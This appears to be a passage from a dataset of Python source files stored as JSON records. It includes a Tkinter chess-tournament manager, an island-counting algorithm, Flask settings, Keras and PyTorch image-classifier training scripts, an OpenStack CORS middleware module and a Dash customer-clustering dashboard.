tournament_labelframe.bind('<>', lambda event: self.player_data_entry())\n\n \"\"\"This section is dedicated fro the building of the tournament objects. it is made by two function:\n The first one is dedicated for the display of the entry box\n The second one is used to create tournament object by getting entry data and added it to the tournament list\"\"\"\n\n #creating tournament object\n def creating_tournament(self):\n name = self.name[1].get()\n palce = self.place[1].get()\n date = self.date[1].get()\n number_of_round = self.number_of_round[1].get()\n if name == '' or palce == '' or date == '':\n value = False\n else :\n value = True\n if value:\n self.tournament_1 = Tournament(name, palce, date, number_of_round)\n self.trounament.append(self.tournament_1)\n self.tournament_name.append (name)\n #show information about the creation of the tournament\n showinfo(\"\", \"le tournois {} été crée\". format(name))\n\n #clear entry widgets\n self.name[1].delete(0,'end')\n self.place[1].delete(0,'end')\n self.date[1].delete(0,'end')\n\n #insert tournament data to data base\n self.tournament_db_table.insert(self.tournament_1.toJson())\n\n #code used only for check. it will be removed at the end rev\n print(self.tournament_1.toJson())\n else:\n showinfo(message='fields are empty')\n\n # creation of tournament data view\n def create_tournament_data_view(self):\n #remove the previous\n self.data_frame.destroy()\n # trounament data frame\n self.new_frame = self.view.create_frame(self.view.root, \"Tournoi\", 600, 400, 1, 0)\n\n # tournament data field\n self.name = self.view.create_entry(self.new_frame, \"Nom de tournoi\", NORMAL, 20, 20)\n self.place = self.view.create_entry(self.new_frame, \"Place\", NORMAL, 20, 70)\n self.date = self.view.create_entry(self.new_frame, \"Date\", NORMAL, 20, 120)\n self.number_of_round = self.view.create_entry(self.new_frame, \"Nombre de tours\", NORMAL, 20, 170)\n self.number_of_round[1].insert(0, \"4\")\n\n # creation of button to generate the tournament\n set_tournament = self.view.create_button(self.new_frame, \"cree le tournoi\", 420, 320)\n set_tournament.configure(command=self.creating_tournament)\n\n #creating main view\n def create_main_view (self):\n\n self.view = View()\n self.menu_frame = self.view.create_frame(self.view.root,\"menu\", 150, 400, 0, 0)\n self.data_frame = self.view.create_frame(self.view.root,\"data\", 600, 400, 1, 0)\n\n #creation of menu buttons\n tournament_button=self.view.create_button(self.menu_frame, \"Tournois\",20,20)\n tournament_button.configure(command = self.create_tournament_data_view)\n players_button = self.view.create_button(self.menu_frame, \"Joueurs\", 20, 50)\n players_button.configure(command= self.create_player_data_view)\n\n #creating a database\n chess_database = data_base('chess_data_base')\n chess_database.db_setup()\n self.plyers_db_table = chess_database.db_create_table('players_table')\n self.tournament_db_table = chess_database.db_create_table('tounament_table')\n\n self.view.main()\n\n\nif __name__ == \"__main__\":\n\n controller = Controller()\n vie = controller.create_main_view()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"controllers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":20551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"264832043","text":"# Given a matrix of 1s and 0s, return the number of \"islands\" in the matrix. A 1 represents land and 0 represents water, so an island is a group of 1s that are neighboring whose perimeter is surrounded by water.\n\n# For example, this matrix has 4 islands.\n\n# 1 0 0 0 0\n# 0 0 1 1 0\n# 0 1 1 0 0\n# 0 0 0 0 0\n# 1 1 0 0 1\n# 1 1 0 0 1\n\ndef count_islands(M):\n n_rows = len(M)\n n_cols = len(M[0])\n count = 0\n\n # Traverse through the array and look for 1. Call it x\n # After a trace, all surrounding 1's of x is filled by 0. Add 1 to count\n # Move to the next non-zero element\n for i in range(n_rows):\n for j in range(n_cols):\n if M[i][j] == 1:\n trace(M, i, j, n_rows, n_cols)\n count += 1\n return count\n\n\ndef trace(M, i, j, n_rows, n_cols):\n '''\n Detect 1 and its surround 1's. Filled them all with zero.\n '''\n\n if i<0 or j<0 or i>=n_rows or j>=n_cols:\n return \n\n M[i][j] = 0 # Fill with 0 the \"current 1\"\n moves = [(i+1,j), (i-1,j), (i,j+1), (i,j-1)] # Possible directions\n\n for i, j in moves:\n # If next cell is 1, continue tracing\n if 0<= i < n_rows and 0<= j< n_cols and M[i][j] == 1:\n trace(M, i, j, n_rows, n_cols)\n return \n\n\nif __name__ == \"__main__\":\n M = [\n [1, 0, 0, 0, 0],\n [0, 0, 1, 1, 0],\n [0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0],\n [1, 1, 0, 0, 1],\n [1, 1, 0, 0, 1]\n ]\n\n print(count_islands(M))","sub_path":"Cracking the Code/count_islands.py","file_name":"count_islands.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"269553160","text":"# -*- coding: utf-8 -*-\nimport os\n\nos_env = os.environ\n\n\nclass Config(object):\n SECRET_KEY = '3nF3Rn0'\n APP_DIR = os.path.abspath(os.path.dirname(__file__)) # This directory\n PROJECT_ROOT = os.path.abspath(os.path.join(APP_DIR, os.pardir))\n\n\nclass ProdConfig(Config):\n \"\"\"Production configuration.\"\"\"\n ENV = 'prod'\n DEBUG = False\n DEBUG_TB_ENABLED = False # Disable Debug toolbar\n HOST = '0.0.0.0'\n MONGO_DBNAME = 'chatbot'\n TEMPLATES_AUTO_RELOAD = False\n SERVER_MESSAGE = 'http://localhost:8890/api/v1'\n JOBS = [\n {\n 'id': 'job1',\n 'func': 'app.app:start_jobs',\n 'trigger': 'interval',\n 'hours': 1\n }\n ]\n\n SCHEDULER_API_ENABLED = True\n\n\nclass DevConfig(Config):\n \"\"\"Development configuration.\"\"\"\n HOST = '0.0.0.0'\n ENV = 'dev'\n DEBUG = True\n DEBUG_TB_ENABLED = True\n ASSETS_DEBUG = True # Don't bundle/minify static assets\n CACHE_TYPE = 'simple' # Can be \"memcached\", \"redis\", etc.\n MONGO_DBNAME = 'chatbot'\n TEMPLATES_AUTO_RELOAD = True\n MONGO_HOST = '46.101.137.23'\n SERVER_MESSAGE = 'http://localhost:8890/api/v1'\n JOBS = [\n {\n 'id': 'job1',\n 'func': 'app.app:start_jobs',\n 'trigger': 'interval',\n 'hours': 1\n }\n ]\n\n SCHEDULER_API_ENABLED = True\n\n","sub_path":"app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"554466398","text":"from tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom tensorflow.keras.optimizers import RMSprop\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport cv2\r\nimport os\r\n\r\n# img = image.load_img(\"C:/Users/ezequielgamer/Desktop/KUARENTENA/PROYECTO INTEGRADOR/API/computer-vision/basedata/training/bueno/0c37fab39da6ded220c3f9ccac8d117c.jpg\")\r\n\r\n# plt.imshow(img) --- comando que muestra la imagen\r\n# cv2.imread(\"C:/Users/ezequielgamer/Desktop/computer-vision/basedata/training/bueno/0c37fab39da6ded220c3f9ccac8d117c.jpg\").shape -- puedes ver las dimansiones de la imagen\r\n\r\ntrain = ImageDataGenerator(rescale= 1/255)\r\nvalidation = ImageDataGenerator(rescale= 1/255)\r\n\r\ntrain_dataset = train.flow_from_directory('C:/Users/lucho/Desktop/computer-vision/basedata/training/', #cambiar\r\ntarget_size= (200,200),\r\nbatch_size= 3,\r\nclass_mode= 'categorical')\r\n\r\nvalidation_dataset = train.flow_from_directory('C:/Users/lucho/Desktop/computer-vision/basedata/validation/', #cambiar\r\ntarget_size= (200,200),\r\nbatch_size= 3,\r\nclass_mode= 'categorical')\r\n\r\n\r\nprint(train_dataset.class_indices) # Indica que numero le fue asignado a cada clase \r\nprint(train_dataset.classes) # Indicaria el valor de cada una de las imagenes\r\n\r\nmodel = tf.keras.models.Sequential([ tf.keras.layers.Conv2D(16,(3,3),activation= 'relu', input_shape=(200,200,3)),\r\n tf.keras.layers.MaxPool2D(2,2),\r\n #\r\n tf.keras.layers.Conv2D(32,(3,3),activation= 'relu'),\r\n tf.keras.layers.MaxPool2D(2,2),\r\n #\r\n tf.keras.layers.Conv2D(64,(3,3),activation= 'relu'),\r\n tf.keras.layers.MaxPool2D(2,2),\r\n ##\r\n tf.keras.layers.Flatten(),\r\n ##\r\n tf.keras.layers.Dense(512,activation= 'relu'),\r\n ##\r\n tf.keras.layers.Dense(10 ,activation= 'softmax') #Para mas de 2 categorias poner \"softmax\" \r\n])\r\n\r\nmodel.compile(loss= 'categorical_crossentropy',\r\n optimizer= RMSprop(lr= 0.001),\r\n metrics=['categorical_accuracy']) #Datos que se van a visualizar la carga de datos\r\n\r\nmodel.fit = model.fit(train_dataset,\r\n steps_per_epoch = 3,\r\n epochs= 30,\r\n validation_data= validation_dataset) # entrenamiento\r\n\r\n\r\ndir_path = 'C:/Users/lucho/Desktop/computer-vision/basedata/testing' # Se cargan las imagenes de test para ver como clasifica. cambiar\r\n\r\nfor i in os.listdir(dir_path): \r\n img = image.load_img(dir_path+'//'+ i,target_size=(200,200))\r\n plt.imshow(img)\r\n plt.show()\r\n\r\n X = image.img_to_array(img)\r\n X = np.expand_dims(X,axis =0)\r\n images = np.vstack([X])\r\n\r\n val = model.predict(images)\r\n arreglo = val\r\n print(val)\r\n\r\n for j in arreglo:\r\n m=max(j)\r\n p=0\r\n for k in j:\r\n p+=1\r\n if k == m:\r\n break\r\n print(p)\r\n\r\n","sub_path":"src/components/Paginas/Upload/computer-vision/calific.py","file_name":"calific.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"73495186","text":"# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied. See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Default allowed headers\nimport copy\nimport logging\n\nfrom oslo_config import cfg\nfrom oslo_middleware import base\nimport webob.dec\nimport webob.exc\nimport webob.response\n\n\nLOG = logging.getLogger(__name__)\n\nCORS_OPTS = [\n cfg.StrOpt('allowed_origin',\n default=None,\n help='Indicate whether this resource may be shared with the '\n 'domain received in the requests \"origin\" header.'),\n cfg.BoolOpt('allow_credentials',\n default=True,\n help='Indicate that the actual request can include user '\n 'credentials'),\n cfg.ListOpt('expose_headers',\n default=['Content-Type', 'Cache-Control', 'Content-Language',\n 'Expires', 'Last-Modified', 'Pragma'],\n help='Indicate which headers are safe to expose to the API. '\n 'Defaults to HTTP Simple Headers.'),\n cfg.IntOpt('max_age',\n default=3600,\n help='Maximum cache age of CORS preflight requests.'),\n cfg.ListOpt('allow_methods',\n default=['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS'],\n help='Indicate which methods can be used during the actual '\n 'request.'),\n cfg.ListOpt('allow_headers',\n default=['Content-Type', 'Cache-Control', 'Content-Language',\n 'Expires', 'Last-Modified', 'Pragma'],\n help='Indicate which header field names may be used during '\n 'the actual request.')\n]\n\n\ndef filter_factory(global_conf,\n allowed_origin,\n allow_credentials=True,\n expose_headers=None,\n max_age=None,\n allow_methods=None,\n allow_headers=None):\n '''Factory to support paste.deploy\n\n :param global_conf: The paste.ini global configuration object (not used).\n :param allowed_origin: Protocol, host, and port for the allowed origin.\n :param allow_credentials: Whether to permit credentials.\n :param expose_headers: A list of headers to expose.\n :param max_age: Maximum cache duration.\n :param allow_methods: List of HTTP methods to permit.\n :param allow_headers: List of HTTP headers to permit from the client.\n :return:\n '''\n\n def filter(app):\n cors_app = CORS(app)\n cors_app.add_origin(allowed_origin=allowed_origin,\n allow_credentials=allow_credentials,\n expose_headers=expose_headers,\n max_age=max_age,\n allow_methods=allow_methods,\n allow_headers=allow_headers)\n return cors_app\n\n return filter\n\n\nclass CORS(base.Middleware):\n \"\"\"CORS Middleware.\n\n This middleware allows a WSGI app to serve CORS headers for multiple\n configured domains.\n\n For more information, see http://www.w3.org/TR/cors/\n \"\"\"\n\n simple_headers = [\n 'Content-Type',\n 'Cache-Control',\n 'Content-Language',\n 'Expires',\n 'Last-Modified',\n 'Pragma'\n ]\n\n def __init__(self, application, conf=None):\n super(CORS, self).__init__(application)\n\n # Begin constructing our configuration hash.\n self.allowed_origins = {}\n\n # Sanity check. Do we have an oslo.config? If so, load it. Else, assume\n # that we'll use add_config.\n if conf:\n self._init_from_oslo(conf)\n\n def _init_from_oslo(self, conf):\n '''Initialize this middleware from an oslo.config instance.'''\n\n # First, check the configuration and register global options.\n conf.register_opts(CORS_OPTS, 'cors')\n\n # Clone our original CORS_OPTS, and set the defaults to whatever is\n # set in the global conf instance. This is done explicitly (instead\n # of **kwargs), since we don't accidentally want to catch\n # allowed_origin.\n subgroup_opts = copy.deepcopy(CORS_OPTS)\n cfg.set_defaults(subgroup_opts,\n allow_credentials=conf.cors.allow_credentials,\n expose_headers=conf.cors.expose_headers,\n max_age=conf.cors.max_age,\n allow_methods=conf.cors.allow_methods,\n allow_headers=conf.cors.allow_headers)\n\n # If the default configuration contains an allowed_origin, don't\n # forget to register that.\n if conf.cors.allowed_origin:\n self.add_origin(**conf.cors)\n\n # Iterate through all the loaded config sections, looking for ones\n # prefixed with 'cors.'\n for section in conf.list_all_sections():\n if section.startswith('cors.'):\n # Register with the preconstructed defaults\n conf.register_opts(subgroup_opts, section)\n self.add_origin(**conf[section])\n\n def add_origin(self, allowed_origin, allow_credentials=True,\n expose_headers=None, max_age=None, allow_methods=None,\n allow_headers=None):\n '''Add another origin to this filter.\n\n :param allowed_origin: Protocol, host, and port for the allowed origin.\n :param allow_credentials: Whether to permit credentials.\n :param expose_headers: A list of headers to expose.\n :param max_age: Maximum cache duration.\n :param allow_methods: List of HTTP methods to permit.\n :param allow_headers: List of HTTP headers to permit from the client.\n :return:\n '''\n\n if allowed_origin in self.allowed_origins:\n LOG.warn('Allowed origin [%s] already exists, skipping' % (\n allowed_origin,))\n return\n\n self.allowed_origins[allowed_origin] = {\n 'allow_credentials': allow_credentials,\n 'expose_headers': expose_headers,\n 'max_age': max_age,\n 'allow_methods': allow_methods,\n 'allow_headers': allow_headers\n }\n\n def process_response(self, response, request=None):\n '''Check for CORS headers, and decorate if necessary.\n\n Perform two checks. First, if an OPTIONS request was issued, let the\n application handle it, and (if necessary) decorate the response with\n preflight headers. In this case, if a 404 is thrown by the underlying\n application (i.e. if the underlying application does not handle\n OPTIONS requests, the response code is overridden.\n\n In the case of all other requests, regular request headers are applied.\n '''\n\n # Sanity precheck: If we detect CORS headers provided by something in\n # in the middleware chain, assume that it knows better.\n if 'Access-Control-Allow-Origin' in response.headers:\n return response\n\n # Doublecheck for an OPTIONS request.\n if request.method == 'OPTIONS':\n return self._apply_cors_preflight_headers(request=request,\n response=response)\n\n # Apply regular CORS headers.\n self._apply_cors_request_headers(request=request, response=response)\n\n # Finally, return the response.\n return response\n\n def _split_header_values(self, request, header_name):\n \"\"\"Convert a comma-separated header value into a list of values.\"\"\"\n values = []\n if header_name in request.headers:\n for value in request.headers[header_name].rsplit(','):\n value = value.strip()\n if value:\n values.append(value)\n return values\n\n def _apply_cors_preflight_headers(self, request, response):\n \"\"\"Handle CORS Preflight (Section 6.2)\n\n Given a request and a response, apply the CORS preflight headers\n appropriate for the request.\n \"\"\"\n\n # If the response contains a 2XX code, we have to assume that the\n # underlying middleware's response content needs to be persisted.\n # Otherwise, create a new response.\n if 200 > response.status_code or response.status_code >= 300:\n response = webob.response.Response(status=webob.exc.HTTPOk.code)\n\n # Does the request have an origin header? (Section 6.2.1)\n if 'Origin' not in request.headers:\n return response\n\n # Is this origin registered? (Section 6.2.2)\n origin = request.headers['Origin']\n if origin not in self.allowed_origins:\n if '*' in self.allowed_origins:\n origin = '*'\n else:\n LOG.debug('CORS request from origin \\'%s\\' not permitted.'\n % (origin,))\n return response\n cors_config = self.allowed_origins[origin]\n\n # If there's no request method, exit. (Section 6.2.3)\n if 'Access-Control-Request-Method' not in request.headers:\n return response\n request_method = request.headers['Access-Control-Request-Method']\n\n # Extract Request headers. If parsing fails, exit. (Section 6.2.4)\n try:\n request_headers = \\\n self._split_header_values(request,\n 'Access-Control-Request-Headers')\n except Exception:\n LOG.debug('Cannot parse request headers.')\n return response\n\n # Compare request method to permitted methods (Section 6.2.5)\n if request_method not in cors_config['allow_methods']:\n return response\n\n # Compare request headers to permitted headers, case-insensitively.\n # (Section 6.2.6)\n for requested_header in request_headers:\n upper_header = requested_header.upper()\n permitted_headers = (cors_config['allow_headers'] +\n self.simple_headers)\n if upper_header not in (header.upper() for header in\n permitted_headers):\n return response\n\n # Set the default origin permission headers. (Sections 6.2.7, 6.4)\n response.headers['Vary'] = 'Origin'\n response.headers['Access-Control-Allow-Origin'] = origin\n\n # Does this CORS configuration permit credentials? (Section 6.2.7)\n if cors_config['allow_credentials']:\n response.headers['Access-Control-Allow-Credentials'] = 'true'\n\n # Attach Access-Control-Max-Age if appropriate. (Section 6.2.8)\n if 'max_age' in cors_config and cors_config['max_age']:\n response.headers['Access-Control-Max-Age'] = \\\n str(cors_config['max_age'])\n\n # Attach Access-Control-Allow-Methods. (Section 6.2.9)\n response.headers['Access-Control-Allow-Methods'] = request_method\n\n # Attach Access-Control-Allow-Headers. (Section 6.2.10)\n if request_headers:\n response.headers['Access-Control-Allow-Headers'] = \\\n ','.join(request_headers)\n\n return response\n\n def _apply_cors_request_headers(self, request, response):\n \"\"\"Handle Basic CORS Request (Section 6.1)\n\n Given a request and a response, apply the CORS headers appropriate\n for the request to the response.\n \"\"\"\n\n # Does the request have an origin header? (Section 6.1.1)\n if 'Origin' not in request.headers:\n return\n\n # Is this origin registered? (Section 6.1.2)\n origin = request.headers['Origin']\n if origin not in self.allowed_origins:\n LOG.debug('CORS request from origin \\'%s\\' not permitted.'\n % (origin,))\n return\n cors_config = self.allowed_origins[origin]\n\n # Set the default origin permission headers. (Sections 6.1.3 & 6.4)\n response.headers['Vary'] = 'Origin'\n response.headers['Access-Control-Allow-Origin'] = origin\n\n # Does this CORS configuration permit credentials? (Section 6.1.3)\n if cors_config['allow_credentials']:\n response.headers['Access-Control-Allow-Credentials'] = 'true'\n\n # Attach the exposed headers and exit. (Section 6.1.4)\n if cors_config['expose_headers']:\n response.headers['Access-Control-Expose-Headers'] = \\\n ','.join(cors_config['expose_headers'])\n","sub_path":"oslo_middleware/cors.py","file_name":"cors.py","file_ext":"py","file_size_in_byte":12928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"377802537","text":"import os\nimport gzip\nimport cPickle\nimport csv\nimport json\n\nimport theano.tensor as T\nimport theano\n# from theano import *\nimport numpy as np\nimport re\nfrom cle.cle.data import Iterator\nfrom nips2015_vrnn.datasets.unk import UNK\n\n# from utils import *\n\nclass datahandler(object):\n def refinedata(self):\n path = \"/Volumes/DATA/Project/Python/nips2015_vrnn/datasets/nipstxt/\"\n max_len = 0\n tokre = re.compile(r'\\b\\S{1,2}\\b')\n for fold in os.listdir(path):\n if fold.startswith(\"out_nips\"):\n print(fold)\n dic = path + \"refined_\" + fold\n if not os.path.exists(dic):\n os.makedirs(dic)\n for fname in os.listdir(path + fold):\n with open(path + fold + \"/\" + fname) as f:\n for sent in f:\n tokre.sub('', sent)\n toklst = sent.split(\" \")\n\n\n def dataloader(self, path, outfile, maxfile, par):\n MAX_LEN = 100 # max len of sentence\n MIN_TOK = 2\n\n cor = []\n doc = []\n max_num_sen = par[0]\n max_num_wd = 0\n num_wd = par[1]\n value = -1\n isfirstline = True\n countdoc = 0\n bat_sz = 200\n max_num_wd_block = cPickle.load(open(maxfile, 'rb'))\n with open(path, 'r') as f:\n for line in f:\n if isfirstline:\n print('File - %s \\n' %line)\n if countdoc%bat_sz==0:\n max_num_wd = max_num_wd_block[0]\n if len(max_num_wd_block) > 0:\n max_num_wd_block = max_num_wd_block[1:]\n countdoc += 1\n isfirstline = False\n continue\n if line.strip() == '' and len(doc) > 0:\n # if len(doc) > max_num_sen:\n # max_num_sen = len(doc)\n cor.append(doc)\n # del doc[:] # reset doc\n doc = [] # using a new array\n isfirstline = True\n continue\n sn = line.strip().split(\" \")\n sn = [int(w) for w in sn]\n # for w in sn:\n # if w > num_wd:\n # num_wd = w\n if len(sn) >= 1:\n # if len(sn) > max_num_wd:\n # max_num_wd = len(sn)\n sent = max_num_wd*[value]\n sent[-len(sn):] = sn # pre zero-padding\n doc.append(sent)\n\n print('Max_len_doc: %d\\n' %max_num_sen)\n print('Max_len_sen: %d\\n' %max_num_wd)\n print('Num_vocab: %d\\n' %(num_wd+1))\n cPickle.dump(cor,open(outfile, mode=\"wb\"))\n\n\n\n\nif __name__ == '__main__':\n dt = datahandler()\n path = '/Volumes/DATA/Project/Python/nips2015_vrnn/datasets/Ads/'\n # dt.dataloader(path + 'Idx_Out_Review_stns.dat', path + 'data_dump', [63, 62, 18316])\n dt.dataloader(path + 'Idx_Out_Ads_stns.dat', path + 'data_dump', path + 'max_num_wd_batches', [87, 15978])\n cor = cPickle.load(open(path + 'data_dump', mode=\"rb\"))\n # data_path = path + 'data_dump'\n # train_x = UNK(path=data_path)\n # data=Iterator(train_x, 10, start=0, end=1989)\n # lengths = [len(s) for s in data]\n print(len(cor))\n print(cor[0])\n\n\n","sub_path":"utils/datahandler.py","file_name":"datahandler.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"582751708","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.plotly as py\nfrom plotly.graph_objs import *\nimport dash_table\nimport numpy as np\nimport pandas as pd\n\n# load the datasets\ndf_customers = pd.read_csv('../data/customers.csv')\n\ndf_customers = df_customers[['pred_cluster','age','category','gender', 'upgraded','score1', 'score2', 'score3']]\n\n# values for our dropdown\n# removed 'upgraded', 'gender', 'category' they grouped the dataset into 2 parts.\ndropdown_val = ['age', 'score1', 'score2', 'score3']\n\n# define color palette\ncolors = [\"#E41A1C\", \"#377EB8\", \"#4DAF4A\", \"#984EA3\", \"#FF7F00\", \"#FFFF33\", \"#A65628\", \"#F781BF\", \"#999999\"]\n\n\napp = dash.Dash()\n###############################################################################\n# build out the HTML\n\nPAGE_SIZE = 5\n# begin making html page\napp.layout = html.Div([\n\t\t\t\t\t\thtml.Div([\n\t\t\t\t\t\t\thtml.H1(\"Red Crown Consulting\"),\n\t\t html.P(\"Customer look-alike tool\")\n\t\t\t\t\t\t],className=\"jumbotron text-center\"),\n\n\t\t\t\t\t\thtml.Div([\n\t\t\t\t\t\thtml.H6(\"Clustering of known customers\"),\n\t\t\t\t\t\thtml.Hr()\n\t\t\t\t\t\t]),\n\n dcc.Dropdown(className=\"col-md-2\", style={\"margin-bottom\": \"10px\"}, id=\"dropdown_x\",\n options=[\n {'label': val, 'value': val} for val in dropdown_val\n ],\n value=dropdown_val[0]\n ),\n\n \tdcc.Dropdown(className=\"col-md-2\", id=\"dropdown_y\",\n \t\toptions=[\n \t\t{'label': val, 'value': val} for val in dropdown_val\n \t\t],\n \t\tvalue=dropdown_val[1]\n \t),\n\n html.Div([\n \t\tdcc.Graph(id=\"cluster\")\n \t\t],style={\"padding\": \"20px\"}),\n\n html.Div([\n\t\t\t\t\t\thtml.Br()\n\t\t\t\t\t\t]),\n\n\n dash_table.DataTable(\n id='table-filtering',\n columns=[\n {\"name\": i, \"id\": i} for i in sorted(df_customers.columns)\n ],\n\n pagination_settings={\n 'current_page': 0,\n 'page_size': PAGE_SIZE\n },\n pagination_mode='be',\n filtering='be',\n filtering_settings=''\n )\n\t\t\t\t\t], className=\"container\", style={\"padding\": \"10px\"})\n\n# import external css\napp.css.append_css({\"external_url\": \"https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css\"})\n# import external javascript\napp.scripts.append_script({\"external_url\": \"https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js\"})\n\n##################################################\n# #\n# Callback Functions to update plots #\n# #\n##################################################\n@app.callback(Output('cluster', 'figure'), [Input('dropdown_x', 'value'), Input('dropdown_y', 'value')])\ndef update_graph(x_val, y_val):\n\t# count number of clusters\n\tnum_of_clusters = df_customers[\"pred_cluster\"].nunique()\n\t# create empty data list to store traces\n\tdata = []\n\n # data.append({\n # \"x\": [190134.88923284,116928.23926923,44090.25903961],\n # \"y\": [32.57335128,35.01601022,37.36368854],\n # \"type\": \"scatter\",\n # \"name\": \"Centroids\",\n # \"mode\": \"markers\",\n # \"marker\": dict(\n # color = \"#F781BF\",\n # size = 13)})\n\n\t# plot the actual labels\n\tfor i in range(num_of_clusters):\n\t # split up the clusters to visualize\n\t cluster_df = df_customers[df_customers[\"pred_cluster\"] == i]\n\t data.append({\n\t \"x\": cluster_df[x_val],\n\t \"y\": cluster_df[y_val],\n\t \"type\": \"scatter\",\n\t \"name\": \"Cluster_\"+str(i),\n\t \"mode\": \"markers\",\n\t \"marker\": dict(\n\t color = colors[i],\n\t size = 13\n\t )\n\t })\n\n\n\tlayout = {\n\t \"hovermode\": \"closest\",\n\t \"margin\": {\n\t \"r\": 10,\n\t \"t\": 25,\n\t \"b\": 40,\n\t \"l\": 60\n\t },\n\t \"title\": \"Customer Dataset - \"+ x_val + \" vs \" + y_val,\n\t \"xaxis\": {\n\t \"domain\": [0, 1],\n\t \"title\": x_val\n\t },\n\t \"yaxis\": {\n\t \"domain\": [0, 1],\n\t \"title\": y_val\n\t }\n\t}\n\n\tfig = {\"data\":data, \"layout\": layout}\n\treturn fig\n\n@app.callback(\n Output('table-filtering', 'data'),\n [Input('table-filtering', 'pagination_settings'),\n Input('table-filtering', 'filtering_settings')])\ndef update_graph(pagination_settings, filtering_settings):\n print(filtering_settings)\n filtering_expressions = filtering_settings.split(' && ')\n dff = df_customers\n for filter in filtering_expressions:\n if ' eq ' in filter:\n col_name = filter.split(' eq ')[0]\n filter_value = filter.split(' eq ')[1]\n dff = dff.loc[dff[col_name] == filter_value]\n if ' > ' in filter:\n col_name = filter.split(' > ')[0]\n filter_value = float(filter.split(' > ')[1])\n dff = dff.loc[dff[col_name] > filter_value]\n if ' < ' in filter:\n col_name = filter.split(' < ')[0]\n filter_value = float(filter.split(' < ')[1])\n dff = dff.loc[dff[col_name] < filter_value]\n return dff.iloc[\n pagination_settings['current_page']*pagination_settings['page_size']:\n (pagination_settings['current_page'] + 1)*pagination_settings['page_size']\n ].to_dict('rows')\n\n\nif __name__ == '__main__':\n app.run_server()\n","sub_path":"Lookalike-Project/customer_app/dashboard_customers.py","file_name":"dashboard_customers.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"622253629","text":"'''\nmodified from http://pytorch.org/tutorials/intermediate/reinforcement_q_learning.html\nand https://github.com/yunjey/pytorch-tutorial/blob/master/tutorials/12%20-%20Deep%20Q%20Network/dqn13.py\n'''\n\nfrom __future__ import print_function\nimport math\nimport random\nimport numpy as np\nimport sys\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom collections import namedtuple\nfrom itertools import count\nfrom copy import deepcopy\nimport time\nimport os\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable as var\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\nimport torchvision.transforms as T\nimport torchvision.models as M\nimport torchvision.datasets as datasets\n\nimport inception\n\nimage_folder = '../../imgs'\nnEpochs = 100\nlearning_rate = 0.01\nbatch_size = 5\n\nUSE_CUDA = torch.cuda.is_available()\n#USE_CUDA = False\nif USE_CUDA:\n import torch.backends.cudnn as cudnn\n cudnn.benchmark = True\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n\n# dtype = torch.cuda.FloatTensor if USE_CUDA else torch.FloatTensor\n\ndef create_plots(results,name):\n folder = os.path.join(os.getcwd(),name)\n if not os.path.exists(folder):\n os.mkdir(folder)\n\n training_acc, testing_acc = results\n epochs = range(nEpochs)\n\n ys = [training_acc, testing_acc]\n scatters = []\n\n colors = cm.rainbow(np.linspace(0, 1, len(ys)))\n for y, c in zip(ys, colors):\n scatters.append(plt.scatter(epochs, y, color=c, s=10))\n\n plt.legend(tuple(scatters),\n ('Training', 'Testing'),\n scatterpoints=1,\n loc='lower right',\n ncol=3,\n fontsize=8)\n\n plt.title('Accuracies vs. Epochs')\n #plt.show()\n plt.draw()\n fig = plt.gcf()\n fig.savefig(os.path.join(folder,'accs_no_aug_lr-001_bs-05.png'))\n plt.clf()\n\ndef train_test_split(dataset, test_size = 0.25, shuffle = False, random_seed = 0):\n \"\"\" Return a list of splitted indices from a DataSet.\n Indices can be used with DataLoader to build a train and testing set.\n\n Arguments:\n A Dataset\n A test_size, as a float between 0 and 1 (percentage split) or as an int (fixed number split)\n Shuffling True or False\n Random seed\n \"\"\"\n length = len(dataset)\n indices = list(range(1,length))\n\n if shuffle == True:\n random.seed(random_seed)\n random.shuffle(indices)\n\n if type(test_size) is float:\n split = math.floor(test_size * length)\n elif type(test_size) is int:\n split = test_size\n else:\n raise ValueError('%s should be an int or a float' % str)\n return indices[split:], indices[:split]\n\n# accepts path to root images directory\n# returns two DataLoaders --- one for training and another for testing\ndef load_data(image_folder):\n\n normalize = T.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n training_transforms = T.Compose([\n T.RandomSizedCrop(299),\n T.RandomHorizontalFlip(),\n T.ToTensor(),\n normalize,\n 